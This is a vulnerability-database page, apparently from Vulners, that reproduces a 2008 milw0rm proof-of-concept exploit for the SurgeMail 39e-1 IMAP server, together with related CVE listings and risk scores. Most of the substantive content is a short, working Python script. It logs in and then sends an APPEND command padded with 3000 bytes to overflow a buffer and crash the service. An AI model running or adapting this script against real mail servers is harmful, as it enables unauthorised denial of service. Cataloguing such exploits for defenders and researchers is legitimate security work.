Surgemail 39e-1 - (Authenticated) IMAP Remote Buffer Overflow (Denial of Service) (PoC)
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| SurgeMail < 3.9g2-2 IMAP Command Handling Unspecified DoS | 18 Aug 200400:00 | – | nessus | |
| SurgeMail IMAP Service APPEND Command Remote DoS | 30 Jun 200800:00 | – | nessus | |
| CVE-2008-2859 | 30 Jun 200800:00 | – | circl | |
| CVE-2008-7182 | 30 Jun 200800:00 | – | circl | |
| CVE-2008-2859 | 25 Jun 200810:00 | – | cve | |
| CVE-2008-7182 | 8 Sep 200910:00 | – | cve | |
| CVE-2008-2859 | 25 Jun 200810:00 | – | cvelist | |
| CVE-2008-7182 | 8 Sep 200910:00 | – | cvelist | |
| EUVD-2008-2852 | 7 Oct 202500:30 | – | euvd | |
| CVE-2008-2859 | 25 Jun 200812:36 | – | nvd |
10
#!/usr/bin/python
#
# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.
# Discovered by: Travis Warren
#
# The IMAP service contains a buffer overflow in the APPEND command.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 3000
s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN [email protected] user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()
# milw0rm.com [2008-06-30]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jun 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.24277